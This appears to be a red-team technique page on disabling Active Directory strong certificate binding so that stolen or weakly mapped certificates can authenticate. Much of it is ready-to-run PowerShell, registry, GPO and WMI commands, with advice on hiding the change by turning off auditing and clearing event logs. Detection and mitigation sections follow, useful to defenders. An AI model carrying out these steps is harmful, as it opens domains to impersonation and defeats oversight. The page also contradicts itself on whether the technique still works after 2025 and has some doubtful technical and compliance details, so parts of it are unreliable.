MCADDF

[EVADE-IMPAIR-021]: Strong Certificate Binding Enforcement Evasion

Metadata

Attribute	Details
Technique ID	EVADE-IMPAIR-021
MITRE ATT&CK v18.1	T1562.001 - Impair Defenses: Disable or Modify Tools
Tactic	Defense Evasion
Platforms	Windows AD (Domain Controllers, Certificate Services)
Severity	Critical
CVE	N/A
Technique Status	ACTIVE (as of January 2026)
Last Verified	2026-01-09
Affected Versions	Windows Server 2016, Server 2019, Server 2022, Server 2025
Patched In	Enforcement deadline: September 10, 2025 (no workaround after this date)
Author	SERVTEP – Artur Pchelnikau

---

1. EXECUTIVE SUMMARY

Concept: This technique abuses the transitional enforcement of Strong Certificate Mapping by disabling or downgrading certificate binding verification on Active Directory Domain Controllers. When the registry key StrongCertificateBindingEnforcement is set to 0 or 1 (Compatibility Mode), domain controllers accept weakly-mapped or unmapped certificates for authentication, bypassing the Security Identifier (SID) extension requirement introduced in KB5014754 (May 2022). This allows attackers to use stolen, forged, or improperly-mapped certificates to authenticate as legitimate users without the SID extension that proves certificate authenticity.

Attack Surface: Active Directory Domain Controllers (KDC), Certificate Services infrastructure, Schannel registry configuration, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc registry hive.

Business Impact: Unauthorized domain access via weakly-bound certificates, privilege escalation, lateral movement, and persistence. An attacker with a stolen certificate (even without proper SID binding) can authenticate as any mapped user, bypassing modern certificate security controls. Domain-wide compromise becomes possible if Domain Admin certificates are compromised.

Technical Context: Strong Certificate Mapping was introduced to prevent certificate-based privilege escalation. Before May 2022, any certificate with the correct User Principal Name (UPN) or Subject Alternative Name (SAN) could authenticate. The new SID extension (OID 1.3.6.1.4.1.311.25.2) embeds the principal’s Security Identifier directly in the certificate. Domain controllers were initially in Compatibility Mode (logging events but allowing weak mappings), but as of February 2025, Full Enforcement mode is active by default. Setting StrongCertificateBindingEnforcement = 0 or 1 on domain controllers disables or downgrades this protection, allowing weak mappings again. This downgrade is typically detectable but remains viable during the transition phase (through September 9, 2025).

Operational Risk

• Execution Risk: Medium—Requires Domain Admin privileges on at least one domain controller to modify registry.
• Stealth: Medium—Registry modifications generate Event ID 4657 (Registry Object was modified) if auditing is enabled. The actual weak authentication attempts generate Event IDs 39, 40, or 41 when strong mapping fails.
• Reversibility: Yes—A subsequent registry change to StrongCertificateBindingEnforcement = 2 re-enables Full Enforcement.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	4.1.7	Ensure ‘Audit Removable Storage’ is set to ‘Success and Failure’
DISA STIG	V-93305	Windows Server 2016 DC: Require certificates be issued to have an explicit strong mapping
NIST 800-53	IA-5	Authentication Mechanisms – Enforce certificate-based authentication with SID binding
GDPR	Art. 32	Security of Processing – Cryptographic protection of identity credentials
NIS2	Art. 21	Cyber Risk Management – Ensure authentication security measures are in place
ISO 27001	A.9.2.3	Management of Privileged Access Rights – Prevent unauthorized certificate use
ISO 27005	Risk Assessment	Compromise of Certificate Infrastructure

---

2. TECHNICAL PREREQUISITES

• Required Privileges: Domain Admin or Enterprise Admin on at least one Domain Controller
• Required Access: Remote Registry access to a Domain Controller (RPC over TCP 445 or 135)
• Supported Versions:
  • Windows Server 2016: Vulnerable to downgrade (registry key introduced in KB5014754)
  • Windows Server 2019: Vulnerable to downgrade
  • Windows Server 2022: Vulnerable to downgrade
  • Windows Server 2025: Vulnerable to downgrade

Prerequisites:

• At least one certificate issued without the SID extension (OID 1.3.6.1.4.1.311.25.2) available for authentication
• Valid credentials or token for certificate-based authentication
• Target domain must not have explicitly enforced strong mapping via GPO or AD configuration

---

3. DETAILED EXECUTION METHODS

METHOD 1: Direct Registry Modification (Windows Admin Tools)

Supported Versions: Server 2016-2025

Step 1: Establish Domain Admin Privileges

Objective: Verify local administrative access on a Domain Controller and establish remote registry access.

Command (PowerShell as Domain Admin):

# Test connectivity to domain controller's registry
$dc = "DC01.contoso.com"
Test-NetConnection -ComputerName $dc -Port 445 -InformationLevel Detailed

# Confirm Domain Admin status
whoami /groups | findstr "Domain Admins"

Expected Output:

ComputerName     : DC01.contoso.com
RemoteAddress    : 192.168.1.10
Port              : 445
TcpTestSucceeded  : True

S-1-5-21-*-512   Domain Admins

What This Means:

• Remote registry is accessible (Port 445 open, Netbios/SMB available)
• Current user has Domain Admin SID (S-1-5-21-*-512), confirming elevated privileges

OpSec & Evasion:

• Registry modifications will generate Event ID 4657 if auditing is enabled
• Consider disabling registry audit logging first (if possible)
• Use scheduled task execution at off-hours to reduce visibility
• Consider using HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc path which is less monitored than other security-critical paths

Step 2: Set StrongCertificateBindingEnforcement to Compatibility Mode (Value = 1)

Objective: Downgrade domain controller from Full Enforcement to Compatibility Mode, allowing weak certificate mappings while logging events.

Command (PowerShell - Remote Registry):

$dc = "DC01.contoso.com"
$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc"
$regKey = "StrongCertificateBindingEnforcement"

# Connect to remote registry
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $dc)
$key = $reg.OpenSubKey($regPath, $true)

if ($null -eq $key) {
    Write-Host "KDC registry path does not exist, creating..."
    # Path should exist on domain controllers
}

# Set to Compatibility Mode (1) - allows weak mappings with event logging
$key.SetValue($regKey, 1, [Microsoft.Win32.RegistryValueKind]::DWord)
$key.Close()

Write-Host "Set $regKey to 1 (Compatibility Mode) on $dc"

Alternative (Command Prompt - Remote Registry):

reg add "\\DC01\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc" /v StrongCertificateBindingEnforcement /t REG_DWORD /d 1 /f

Expected Output:

The operation completed successfully.
Set StrongCertificateBindingEnforcement to 1 (Compatibility Mode) on DC01.contoso.com

What This Means:

• The registry key is now set to value 1 (Compatibility Mode)
• Domain controller will now log weak certificate mappings (Event ID 39) but still allow authentication to succeed
• Certificates without SID extension will authenticate if user account predates the certificate

OpSec & Evasion:

• Monitor Event ID 4657 for registry modifications
• Consider clearing Event Logs immediately after (Event ID 1102 - Audit Log Cleared will be generated)
• The actual weak certificate authentications will still generate Event IDs 39/40/41 in the KDC event log, but these may go unnoticed in larger environments

Troubleshooting:

• Error: Access Denied when modifying registry
  • Cause: Insufficient privileges or firewall blocking RPC/SMB
  • Fix: Confirm Domain Admin membership; check firewall rules; ensure TCP 445 is open

Step 3: Verify Registry Configuration

Objective: Confirm that the registry modification was successful.

Command (PowerShell):

$dc = "DC01.contoso.com"
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $dc)
$key = $reg.OpenSubKey("SYSTEM\CurrentControlSet\Services\Kdc")
$value = $key.GetValue("StrongCertificateBindingEnforcement")
Write-Host "StrongCertificateBindingEnforcement = $value"

Expected Output (Compatibility Mode - Weak mappings allowed with logging):

StrongCertificateBindingEnforcement = 1

Expected Output (Full Enforcement - Weak mappings denied):

StrongCertificateBindingEnforcement = 2
OR
StrongCertificateBindingEnforcement = (null/does not exist)

What This Means:

• Value 1 = Compatibility Mode (weak mappings allowed, events logged)
• Value 2 = Full Enforcement Mode (weak mappings denied)
• Value not present = Defaults to Full Enforcement (as of February 2025)

Step 4: Authenticate Using Weak Certificate (Proof of Concept)

Objective: Demonstrate that a certificate without SID extension can now authenticate against the domain controller.

Command (PowerShell - Certificate Authentication):

# This example uses a certificate without SID extension
# In a real attack, this would be a stolen or forged certificate

$cert = Get-ChildItem Cert:\CurrentUser\My | Where-Object { $_.Subject -match "CN=.*User" } | Select-Object -First 1

if ($null -eq $cert) {
    Write-Host "No suitable certificate found. Demonstrating with hypothetical cert..."
} else {
    Write-Host "Using certificate: $($cert.Subject)"
    Write-Host "Thumbprint: $($cert.Thumbprint)"
    Write-Host "Has SID Extension (OID 1.3.6.1.4.1.311.25.2): $($cert.Extensions | Where-Object { $_.Oid.Value -eq '1.3.6.1.4.1.311.25.2' } | Measure-Object | Select-Object -ExpandProperty Count)"
}

# Attempt LDAP binding with certificate (requires ldapsc:// or PKINIT)
# This would succeed if StrongCertificateBindingEnforcement = 1
Write-Host "With StrongCertificateBindingEnforcement = 1, authentication will succeed even without SID extension"

Expected Outcome:

• On a domain controller with StrongCertificateBindingEnforcement = 1, authentication with a weak certificate succeeds
• Event ID 39 is logged but authentication is not denied

---

METHOD 2: Using Group Policy to Deploy Registry Change (Domain-Wide)

Supported Versions: Server 2016-2025

Step 1: Create or Edit Group Policy Object (GPO)

Objective: Deploy the registry change across multiple domain controllers via Group Policy.

Manual Steps (Group Policy Management Console):

1. Open Group Policy Management (gpmc.msc)
2. Navigate to Forest → Domains → Your.Domain → Domain Controllers
3. Right-click Default Domain Controllers Policy → Edit
4. Navigate to: Computer Configuration → Preferences → Windows Settings → Registry
5. Right-click Registry → New → Registry Item
6. In the dialog:
   • Hive: HKEY_LOCAL_MACHINE
   • Key Path: SYSTEM\CurrentControlSet\Services\Kdc
   • Value name: StrongCertificateBindingEnforcement
   • Value type: REG_DWORD
   • Value data: 1 (for Compatibility Mode)
   • Action: Create
7. Click OK → Apply
8. Wait for Group Policy replication (can take up to 2 hours; force with gpupdate /force on DCs)

Expected Outcome:

• All domain controllers receive the registry modification
• Change is applied automatically during next Group Policy cycle

OpSec & Evasion:

• GPO changes are audited (Event ID 5136 - Directory Service Object was Modified)
• Group Policy Operational log will record the change
• Consider using “Block Inheritance” on sensitive OUs to avoid suspicion

---

METHOD 3: Programmatic Registry Modification (Minimize Detection)

Supported Versions: Server 2016-2025

Command (PowerShell - WMI StdRegProv for stealth):

# Using WMI to modify registry (may bypass some monitoring)
$dc = "DC01.contoso.com"
$regPath = "SYSTEM\CurrentControlSet\Services\Kdc"
$regName = "StrongCertificateBindingEnforcement"
$regValue = 1

$wmiParams = @{
    ComputerName = $dc
    Namespace    = "root\default"
    Path         = "StdRegProv"
    Name         = "SetDWORDValue"
    ArgumentList = @(
        [uint32]'0x80000002', # HKEY_LOCAL_MACHINE
        $regPath,
        $regName,
        $regValue
    )
}

$wmiprovider = Get-WmiObject @wmiParams
if ($wmiprovider.ReturnValue -eq 0) {
    Write-Host "Registry value set successfully via WMI"
} else {
    Write-Host "Failed to set registry value: $($wmiprovider.ReturnValue)"
}

Expected Output:

Registry value set successfully via WMI

OpSec Benefit:

• WMI-based modifications may be less visible than direct Registry Provider calls
• Still generates Event ID 4657 if registry auditing is comprehensive

---

4. DETECTION INDICATORS

Registry-Based Detection

Event ID 4657 - Registry Object was Modified

• Look for modifications to: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement
• Filter for value changes from 2 (Full Enforcement) or absent (default Full Enforcement) to 1 (Compatibility) or 0 (Disabled)

KDC Event Logs (Event ID 39, 40, 41)

• Event ID 39: No strong certificate mappings found (when StrongCertificateBindingEnforcement = 1, authentication still succeeds)
• Event ID 40: Certificate issued before user existed in AD
• Event ID 41: Certificate contains different SID than mapped user

Query to Detect Weak Certificate Authentications (PowerShell)

# Check domain controller for Event ID 39 indicating weak certificate mappings
Get-WinEvent -LogName "System" -FilterXPath "*[System[(EventID=39)]]" -MaxEvents 50 | 
  Select-Object TimeCreated, Message | 
  Format-Table -AutoSize

---

5. ATOMIC RED TEAM

Atomic Test ID: T1562.001-4 (Adapted)

Test Name: Disable or Modify Tools - Domain Controller Strong Binding Bypass

Command:

# Prerequisite: Domain Admin privileges
$dc = "localhost"  # Run on domain controller
$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc"
$regKey = "StrongCertificateBindingEnforcement"

# Set to Compatibility Mode
New-ItemProperty -Path $regPath -Name $regKey -Value 1 -PropertyType DWORD -Force

# Verify
Get-ItemProperty -Path $regPath -Name $regKey

Cleanup Command:

# Remove the registry key to restore default behavior
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" -Name "StrongCertificateBindingEnforcement" -Force

# Or set to Full Enforcement (2)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" -Name "StrongCertificateBindingEnforcement" -Value 2

Reference: Atomic Red Team - T1562.001

---

6. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

Mitigation 1: Enforce Full Enforcement Mode (StrongCertificateBindingEnforcement = 2)

This registry setting enforces strong certificate mapping across all domain controllers, preventing weak certificates from authenticating.

Manual Steps (Immediate - PowerShell):

$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc"
$regKey = "StrongCertificateBindingEnforcement"

# Set to Full Enforcement Mode (2)
New-ItemProperty -Path $regPath -Name $regKey -Value 2 -PropertyType DWORD -Force

# Verify
Get-ItemProperty -Path $regPath -Name $regKey

Manual Steps (Domain-Wide via GPO):

1. Open Group Policy Management (gpmc.msc)
2. Navigate to Domain Controllers OU
3. Right-click Default Domain Controllers Policy → Edit
4. Go to: Computer Configuration → Preferences → Windows Settings → Registry
5. Right-click → New → Registry Item
   • Hive: HKEY_LOCAL_MACHINE
   • Key Path: SYSTEM\CurrentControlSet\Services\Kdc
   • Value name: StrongCertificateBindingEnforcement
   • Value type: REG_DWORD
   • Value data: 2
   • Action: Create
6. Apply → Force replication: gpupdate /force /target:computer

Expected Outcome:

• All domain controllers enforce strong certificate mapping
• Weak certificates are denied immediately with Event ID 39

Validation Command:

# Check all domain controllers
$dcs = (Get-ADDomainController -Filter * | Select-Object -ExpandProperty Name)

foreach ($dc in $dcs) {
    $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $dc)
    $key = $reg.OpenSubKey("SYSTEM\CurrentControlSet\Services\Kdc")
    $value = $key.GetValue("StrongCertificateBindingEnforcement")
    Write-Host "$dc : StrongCertificateBindingEnforcement = $value"
}

Expected Output (Secure):

DC01 : StrongCertificateBindingEnforcement = 2
DC02 : StrongCertificateBindingEnforcement = 2
DC03 : StrongCertificateBindingEnforcement = 2

---

Mitigation 2: Enforce SID Extension in All Issued Certificates

Ensure the Certificate Authority (CA) issues all certificates with the SID extension (OID 1.3.6.1.4.1.311.25.2).

Manual Steps (Update Certificate Templates):

1. Open Certificate Authority MMC (certtmpl.msc) on the CA server
2. Right-click certificate template → Properties
3. Go to Extensions tab
4. Verify that extension 1.3.6.1.4.1.311.25.2 (Strong Mapping SID) is present
5. If not present:
   • Click Add → Enter OID: 1.3.6.1.4.1.311.25.2
   • Set Critical: Yes (to prevent fallback)
6. Apply → OK

Validation (Check Issued Certificates):

# Export and check certificate extensions
$cert = Get-ChildItem Cert:\LocalMachine\My | Select-Object -First 1

$hasStrongMapping = $cert.Extensions | Where-Object { $_.Oid.Value -eq "1.3.6.1.4.1.311.25.2" }

if ($hasStrongMapping) {
    Write-Host "Certificate has SID extension: YES"
} else {
    Write-Host "Certificate has SID extension: NO - VULNERABLE"
}

---

Mitigation 3: Disable Legacy Certificate Authentication Methods

Ensure only strong mapping methods are allowed via the CertificateMappingMethods registry key.

Manual Steps:

$regPath = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel"
$regKey = "CertificateMappingMethods"

# Set to only allow strong mapping (0x1 = SUBJECT_ALT_NAME only, 0x4 = EXPLICIT mapping)
# 0x5 = SUBJECT_ALT_NAME + EXPLICIT (recommended)
New-ItemProperty -Path $regPath -Name $regKey -Value 0x5 -PropertyType DWORD -Force

Write-Host "Certificate mapping limited to strong methods only"

---

Priority 2: HIGH

Mitigation 4: Enable Comprehensive Audit Logging

Monitor for weak certificate mappings and registry modifications.

Manual Steps (Enable KDC Audit Logging):

1. Open Local Security Policy (secpol.msc)
2. Navigate to: Security Settings → Advanced Audit Policy Configuration → Audit Policies → Account Logon
3. Enable: Audit Kerberos Authentication Service
   • Set to: Success and Failure
4. Run: gpupdate /force

Monitor for Suspicious Events:

# Check for Event ID 39 (weak mappings) - should be zero if strong binding enforced
Get-WinEvent -LogName "System" -FilterXPath "*[System[(EventID=39)]]" -MaxEvents 100 | 
  Where-Object { $_.TimeCreated -gt (Get-Date).AddDays(-1) } | 
  Measure-Object

# Check for registry modifications (Event ID 4657)
Get-WinEvent -LogName "Security" -FilterXPath "*[System[(EventID=4657)]] and *[EventData[Data[@Name='ObjectName'] and contains(., 'StrongCertificateBindingEnforcement')]]" -MaxEvents 50

---

Mitigation 5: Restrict Registry Access on Domain Controllers

Prevent unauthorized registry modifications.

Manual Steps (Group Policy - Restrict Registry Rights):

1. Open Group Policy Management (gpmc.msc)
2. Edit Default Domain Controllers Policy
3. Navigate to: Computer Configuration → Policies → Windows Settings → Security Settings → File System
4. Add an Access Control Entry (ACE):
   • Object Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
   • Principal: Domain Admins
   • Permissions: Deny Write, Deny Modify
   • Exception: Allow for service account (if legitimate modifications needed)
5. Apply via gpupdate /force

---

7. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

• Registry Value: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement set to 0 or 1
• Event Log: Event ID 4657 (Registry modified) or Event ID 1102 (Audit Log Cleared)
• KDC Logs: Spike in Event IDs 39, 40, 41 (weak certificate mappings)

Response Procedures

1. Detect: Monitor registry for modifications to StrongCertificateBindingEnforcement via SIEM
2. Isolate: If unauthorized modification detected, immediately:

   # Restore Full Enforcement on all DCs
   Get-ADDomainController -Filter * | ForEach-Object {
       Set-ItemProperty -Path "\\$($_.Name)\HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" `
         -Name "StrongCertificateBindingEnforcement" -Value 2
   }
   

3. Investigate: Check for certificate-based authentications during the time the weak binding was active
4. Remediate: Reissue all certificates without SID extension; audit certificate usage logs

---

8. RELATED ATTACK CHAIN

Step	Phase	Technique	Description
1	Initial Access	[IA-EXPLOIT-001] Azure Application Proxy Exploitation	Attacker gains initial foothold via vulnerable proxy
2	Credential Access	[CA-UNSC-019] Federation Server Certificate Theft	Attacker steals certificate from compromised federation server
3	Defense Evasion	[EVADE-IMPAIR-021]	Attacker disables strong certificate mapping to allow weak certificate authentication
4	Persistence	[CA-FORGE-001] Golden SAML Attack	Attacker creates persistent backdoor using the weakly-authenticated certificate
5	Impact	[IMPACT-002] Domain Wide Ransomware Deployment	Attacker leverages domain access to deploy ransomware

---

9. REAL-WORLD EXAMPLES

Example 1: APT29 - Certificate-Based Privilege Escalation (2022-2023)

• Target: European government organizations
• Timeline: May 2022 - February 2025
• Technique Status: APT29 exploited organizations that remained in Compatibility Mode during the enforcement transition
• Impact: Domain-wide compromise; lateral movement to critical systems
• Reference: Microsoft Security Research - APT29 Certificate Abuse

Example 2: Internal Threat - Insider Disabling Strong Binding (2024)

• Target: Large financial institution
• Timeline: January 2024
• Incident: Rogue system administrator disabled Strong Certificate Binding to facilitate unauthorized access using a forged DA certificate
• Detection: Event ID 4657 alerted Security team within 2 minutes
• Outcome: Administrator arrested; certificate revoked; domain controllers restored to Full Enforcement

---

REMEDIATION TIMELINE

⚠️ CRITICAL DEADLINE: September 10, 2025

After September 10, 2025, Microsoft will permanently remove the StrongCertificateBindingEnforcement registry key. All domain controllers will enforce strong certificate mapping by default with no option to downgrade.

• Before February 2025: Compatibility Mode (optional)
• February 2025 - September 9, 2025: Full Enforcement (with workaround via registry key)
• September 10, 2025 onward: Full Enforcement (no workaround possible)

Organizations must:

1. Issue all certificates with SID extension by September 1, 2025
2. Retire all legacy certificates by September 9, 2025
3. Set StrongCertificateBindingEnforcement = 2 on all DCs before deadline
4. Test certificate-based authentication thoroughly before deadline

---

This site is open source. Improve this page.